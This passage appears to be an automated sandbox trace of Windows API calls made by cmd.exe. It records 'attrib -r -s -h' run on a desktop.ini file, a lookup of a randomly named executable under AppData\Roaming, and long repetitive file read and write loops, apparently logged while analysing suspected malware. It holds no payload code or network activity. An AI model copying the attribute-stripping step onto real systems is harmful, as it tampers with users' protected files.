lpAttributeList=0x2cf4a8, 
lpPreviousValue=0x0) returned 1 [0209.275] GetStartupInfoW (in: lpStartupInfo=0x2cf464 | out: lpStartupInfo=0x2cf464*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0209.275] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0209.276] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\Default\\Contacts\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cf504*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\Default\\Contacts\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf550 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\Default\\Contacts\\desktop.ini\" ", lpProcessInformation=0x2cf550*(hProcess=0x50, hThread=0x4c, dwProcessId=0x3a4, dwThreadId=0xf98)) returned 1 [0209.286] CloseHandle (hObject=0x4c) returned 1 [0209.286] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0209.286] GetEnvironmentStringsW () returned 0x440838* [0209.287] FreeEnvironmentStringsW (penv=0x440838) returned 1 [0209.287] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0209.436] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2cf444 | out: lpExitCode=0x2cf444*=0x0) returned 1 [0209.436] CloseHandle (hObject=0x50) returned 1 [0209.436] _vsnwprintf (in: _Buffer=0x2cf58c, 
_BufferCount=0x13, _Format="%08X", _ArgList=0x2cf450 | out: _Buffer="00000000") returned 8 [0209.436] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0209.436] GetEnvironmentStringsW () returned 0x442558* [0209.436] FreeEnvironmentStringsW (penv=0x442558) returned 1 [0209.436] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0209.436] GetEnvironmentStringsW () returned 0x442558* [0209.436] FreeEnvironmentStringsW (penv=0x442558) returned 1 [0209.436] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cf4a8 | out: lpAttributeList=0x2cf4a8) [0209.436] GetConsoleTitleW (in: lpConsoleTitle=0x2cf828, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.437] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Contacts\\desktop.ini" (normalized: "c:\\users\\default\\contacts\\desktop.ini")) returned 0x20 [0209.437] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Contacts" (normalized: "c:\\users\\default\\contacts")) returned 0x11 [0209.437] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0209.437] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0209.437] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Contacts\\desktop.ini" (normalized: "c:\\users\\default\\contacts\\desktop.ini")) returned 0x20 [0209.438] FindNextFileW (in: hFindFile=0x442c78, lpFindFileData=0x4435e4 | out: lpFindFileData=0x4435e4) returned 0 [0209.438] GetLastError () returned 0x12 [0209.438] FindClose (in: hFindFile=0x442c78 | out: hFindFile=0x442c78) returned 1 [0209.440] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0209.440] GetConsoleTitleW (in: lpConsoleTitle=0x2cf7c4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.440] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0209.440] 
ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.441] GetFileType (hFile=0x50) returned 0x1 [0209.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.441] GetFileType (hFile=0x50) returned 0x1 [0209.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.441] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.442] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.442] GetFileType (hFile=0x50) returned 0x1 [0209.442] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.443] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.443] GetFileType (hFile=0x50) returned 0x1 [0209.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.443] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.443] GetFileType (hFile=0x50) returned 0x1 [0209.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.443] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.443] GetFileType (hFile=0x50) returned 0x1 
[0209.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.443] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.443] GetFileType (hFile=0x50) returned 0x1 [0209.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.443] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.443] GetFileType (hFile=0x50) returned 0x1 [0209.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.443] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.444] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.444] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.444] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.444] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.444] GetFileType (hFile=0x50) returned 0x1 [0209.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.444] GetFileType (hFile=0x50) returned 0x1 [0209.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.444] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, 
lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.444] GetFileType (hFile=0x50) returned 0x1 [0209.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.444] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.444] GetFileType (hFile=0x50) returned 0x1 [0209.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.444] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.444] GetFileType (hFile=0x50) returned 0x1 [0209.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.444] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.444] GetFileType (hFile=0x50) returned 0x1 [0209.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] GetFileType (hFile=0x50) returned 0x1 [0209.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, 
lpOverlapped=0x0) returned 1 [0209.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] GetFileType (hFile=0x50) returned 0x1 [0209.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.445] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.445] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.445] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.445] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] GetFileType (hFile=0x50) returned 0x1 [0209.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] GetFileType (hFile=0x50) returned 0x1 [0209.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] GetFileType (hFile=0x50) returned 0x1 [0209.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] GetFileType (hFile=0x50) returned 0x1 [0209.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] WriteFile (in: hFile=0x50, 
lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] GetFileType (hFile=0x50) returned 0x1 [0209.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.445] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.446] GetFileType (hFile=0x50) returned 0x1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.446] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.446] GetFileType (hFile=0x50) returned 0x1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.446] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.446] GetFileType (hFile=0x50) returned 0x1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.446] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.446] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.446] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.446] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0209.446] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.446] GetFileType (hFile=0x50) returned 0x1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.446] GetFileType (hFile=0x50) returned 0x1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.446] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.446] GetFileType (hFile=0x50) returned 0x1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.446] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.446] GetFileType (hFile=0x50) returned 0x1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.446] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] GetFileType (hFile=0x50) returned 0x1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] 
GetFileType (hFile=0x50) returned 0x1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] GetFileType (hFile=0x50) returned 0x1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] GetFileType (hFile=0x50) returned 0x1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.447] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.447] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.447] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.447] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] GetFileType (hFile=0x50) returned 0x1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] GetFileType (hFile=0x50) returned 0x1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | 
out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] GetFileType (hFile=0x50) returned 0x1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.447] GetFileType (hFile=0x50) returned 0x1 [0209.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] GetFileType (hFile=0x50) returned 0x1 [0209.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] GetFileType (hFile=0x50) returned 0x1 [0209.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] GetFileType (hFile=0x50) returned 0x1 [0209.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, 
lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] GetFileType (hFile=0x50) returned 0x1 [0209.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.448] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.448] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.448] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.448] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] GetFileType (hFile=0x50) returned 0x1 [0209.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] GetFileType (hFile=0x50) returned 0x1 [0209.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] GetFileType (hFile=0x50) returned 0x1 [0209.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.448] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.449] GetFileType (hFile=0x50) returned 0x1 [0209.449] _get_osfhandle (_FileHandle=1) returned 0x50 
[0209.449] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.449] GetFileType (hFile=0x50) returned 0x1 [0209.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.449] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.449] GetFileType (hFile=0x50) returned 0x1 [0209.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.449] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.449] GetFileType (hFile=0x50) returned 0x1 [0209.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.449] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.449] GetFileType (hFile=0x50) returned 0x1 [0209.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.449] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.449] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.449] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) 
